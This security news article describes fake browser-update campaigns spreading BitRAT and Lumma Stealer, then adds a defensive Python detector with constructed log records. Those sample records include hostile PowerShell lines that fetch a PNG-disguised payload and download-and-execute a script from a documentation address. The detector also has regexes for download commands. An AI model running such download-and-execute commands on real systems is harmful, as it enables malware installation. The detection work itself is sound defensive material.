Tomcat
How BitRAT and Lumma Stealer deceive users by posing as legitimate browser updates.
Fake browser updates are actively used to spread Remote Access Trojans (RAT) and other malware such as BitRAT and Lumma Stealer (also known as LummaC2).
According to a recent report by cybersecurity company eSentire, fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish. In April 2024, eSentire observed FakeBat being distributed through similar fake update mechanisms.
The attack begins when a potential victim visits a compromised website containing JavaScript code that redirects the user to a fake browser update page ("chatgpt-app[.]cloud"). This page contains a link to a ZIP archive ("Update.zip") hosted on Discord, which is automatically downloaded to the victim's device.
The use of Discord as an attack vector is becoming increasingly common: a recent analysis from Bitdefender revealed more than 50,000 dangerous links spreading malware, phishing campaigns, and spam over the past six months.
The ZIP archive contains a JavaScript file ("Update.js") that launches PowerShell scripts. These scripts retrieve additional payloads, including BitRAT and Lumma Stealer, from a remote server disguised as PNG image files.
The scripts also fetch further PowerShell code to establish persistence and a .NET-based loader that runs the final malware stage. eSentire's analysts believe the loader is likely being advertised as a "malware delivery service", since the same loader is used to deliver both BitRAT and Lumma Stealer.
BitRAT is a multi-functional RAT that lets attackers harvest data, mine cryptocurrency, download additional binaries, and remotely control infected devices. Lumma Stealer, offered for $250 to $1,000 per month since August 2022, can capture information from web browsers, cryptocurrency wallets, and other sources.
eSentire notes that the fake browser update lure has become a popular way of gaining a foothold on devices and networks, showing how attackers exploit trusted brand names for maximum reach and impact.
Such attacks often rely on drive-by download techniques and malvertising. A recent report from ReliaQuest describes a new variant of the ClearFake campaign in which users are tricked into manually copying and executing malicious PowerShell code under the guise of a browser update.
The attackers use fake web pages claiming that "an error occurred while displaying this web page" and instructing the visitor to install a root certificate by following a series of steps, which include copying and running hidden PowerShell code.
Once executed, the PowerShell code performs several functions, including clearing the DNS cache, displaying a message, downloading additional PowerShell code, and installing the LummaC2 malware.
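The two execution chains described above leave different traces in endpoint telemetry: the eSentire chain shows a script host (Update.js) spawning PowerShell that fetches payloads named as PNG files, while the ClearFake variant runs inside a shell the user opened themselves, so there is no new powershell.exe process to key on and the DNS cache flush plus the follow-on download have to be correlated back to that shell. The following is an added example, not eSentire's or ReliaQuest's detection content and not code from either campaign: a small Python detector that runs over constructed, tab-separated process-creation and PowerShell script-block records. The field names, the list of download primitives, the 203.0.113.10 address and every sample record are assumptions made for this example.

```python
"""Heuristic detection of fake-browser-update execution chains over endpoint telemetry.
Added example, not eSentire's or ReliaQuest's detection content. Assumed input: one record
per line, tab-separated key=value fields modelled on Sysmon process creation
(Type=ProcessCreate) and PowerShell script block logging (Type=ScriptBlock)."""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Download primitives worth flagging in shell command text (assumed list).
DOWNLOAD_RE = re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|"
                         r"DownloadFile|DownloadData|Start-BitsTransfer|curl|wget)\b", re.I)
# Second-stage payloads were served "as PNG files": a shell fetching an image URL.
IMAGE_URL_RE = re.compile(r"https?://\S+?\.(?:png|jpg|jpeg|gif|bmp)\b", re.I)
DNS_FLUSH_RE = re.compile(r"ipconfig(?:\.exe)?\s+/flushdns|Clear-DnsClientCache", re.I)
DOWNLOADED_JS_RE = re.compile(r"\\downloads\\.*\.js\b", re.I)


def parse_event(line):
    """Split 'k=v<TAB>k=v...' into a dict; values keep any '=' they contain."""
    return {k.strip(): v.strip() for k, _, v in (p.partition("=") for p in line.split("\t"))}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


class FakeUpdateDetector:
    """Per-PID state lets the ClearFake paste pattern (user-opened shell, DNS cache
    flush, then download of more code) fire once even though it spans several records."""

    def __init__(self):
        self.behaviours = defaultdict(set)  # pid -> behaviour tags seen so far
        self.interactive = set()            # PowerShell PIDs started from explorer.exe
        self.reported = set()               # (rule, pid) pairs already alerted

    def _alert(self, alerts, rule, pid):
        if (rule, pid) not in self.reported:
            self.reported.add((rule, pid))
            alerts.append((rule, pid))

    def _observe(self, alerts, pid, text):
        """Credit command text (own command line, child process or script block) to a shell PID."""
        tags = self.behaviours[pid]
        if DOWNLOAD_RE.search(text):
            tags.add("download")
            if IMAGE_URL_RE.search(text):
                self._alert(alerts, "powershell_fetches_image_url", pid)
        if DNS_FLUSH_RE.search(text):
            tags.add("dns_flush")
        if pid in self.interactive and {"download", "dns_flush"} <= tags:
            self._alert(alerts, "clearfake_paste_sequence", pid)

    def feed(self, ev):
        alerts = []
        pid, ppid = int(ev.get("Pid", 0)), int(ev.get("Ppid", 0))
        if ev.get("Type") == "ProcessCreate":
            image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            if image in SCRIPT_HOSTS and DOWNLOADED_JS_RE.search(cmd):
                self._alert(alerts, "script_host_runs_downloaded_js", pid)  # the Update.js stage
            if image in SHELLS:
                if parent in SCRIPT_HOSTS:
                    self._alert(alerts, "script_host_spawns_powershell", pid)
                if parent == "explorer.exe":
                    self.interactive.add(pid)  # a shell the user opened and may paste into
                self._observe(alerts, pid, cmd)
            elif image == "ipconfig.exe" and parent in SHELLS:
                self._observe(alerts, ppid, cmd)  # child flush: credit the parent shell
        elif ev.get("Type") == "ScriptBlock":
            self._observe(alerts, pid, ev.get("ScriptBlockText", ""))
        return alerts


def scan(lines):
    det = FakeUpdateDetector()
    return [a for line in lines for a in det.feed(parse_event(line))]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [  # constructed records; 203.0.113.10 is a documentation-only address
    "\t".join([r"Type=ProcessCreate", r"Pid=4100", r"Ppid=3000", r"ParentImage=C:\Windows\explorer.exe",
               r"Image=C:\Windows\System32\wscript.exe",
               r'CommandLine="C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Update\Update.js"']),
    "\t".join([r"Type=ProcessCreate", r"Pid=4120", r"Ppid=4100", r"ParentImage=C:\Windows\System32\wscript.exe",
               "Image=" + PS, r'CommandLine=powershell.exe -w hidden -c "$b=(iwr http://203.0.113.10/img/update.png).Content"']),
    "\t".join([r"Type=ProcessCreate", r"Pid=4500", r"Ppid=3000", r"ParentImage=C:\Windows\explorer.exe",
               "Image=" + PS, r"CommandLine=powershell.exe -NoProfile -Command Get-Process"]),  # benign
    "\t".join([r"Type=ProcessCreate", r"Pid=5200", r"Ppid=3000", r"ParentImage=C:\Windows\explorer.exe",
               "Image=" + PS, 'CommandLine="' + PS + '"']),  # user opens an interactive shell
    "\t".join([r"Type=ScriptBlock", r"Pid=5200", r"ScriptBlockText=ipconfig /flushdns; "
               r"[Windows.Forms.MessageBox]::Show('Fixed'); iex (iwr http://203.0.113.10/fix.ps1).Content"]),
    "\t".join([r"Type=ProcessCreate", r"Pid=5210", r"Ppid=5200", "ParentImage=" + PS,
               r"Image=C:\Windows\System32\ipconfig.exe", r"CommandLine=ipconfig /flushdns"]),
]

if __name__ == "__main__":
    for rule, pid in scan(SAMPLE_LOG):
        print(f"{rule:32} pid={pid}")
```

Running the script prints four alerts for the six constructed records: the script host executing a .js file from Downloads, the PowerShell child of that script host, the same process fetching an image URL, and the paste sequence on PID 5200; the benign admin shell and the duplicate ipconfig child record produce nothing. The download-primitive match on its own is deliberately not an alert, since legitimate administration scripts use the same cmdlets; it only counts when paired with an image URL or with the flush-then-download sequence in a user-opened shell. In a real deployment the interactive-shell marker should also cover conhost and Windows Terminal parents, and script block logging (event 4104) must be enabled for the pasted ClearFake script to be visible at all.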
Lumma Stealer became one of the most widespread information stealers in 2023, alongside RedLine and Raccoon. The number of LummaC2 logs offered for sale increased by 110% from the third to the fourth quarter of 2023. LummaC2's success is attributed to its effectiveness at infiltrating systems and exfiltrating sensitive data without detection.
As part of its defensive response, eSentire quickly identified the suspicious activity and isolated the infected device within the client's environment. Indicators of compromise for the identified threats are listed in eSentire's report.
This incident highlights the importance of raising awareness among users about the authenticity of update notifications and the need to download updates only from trusted sources.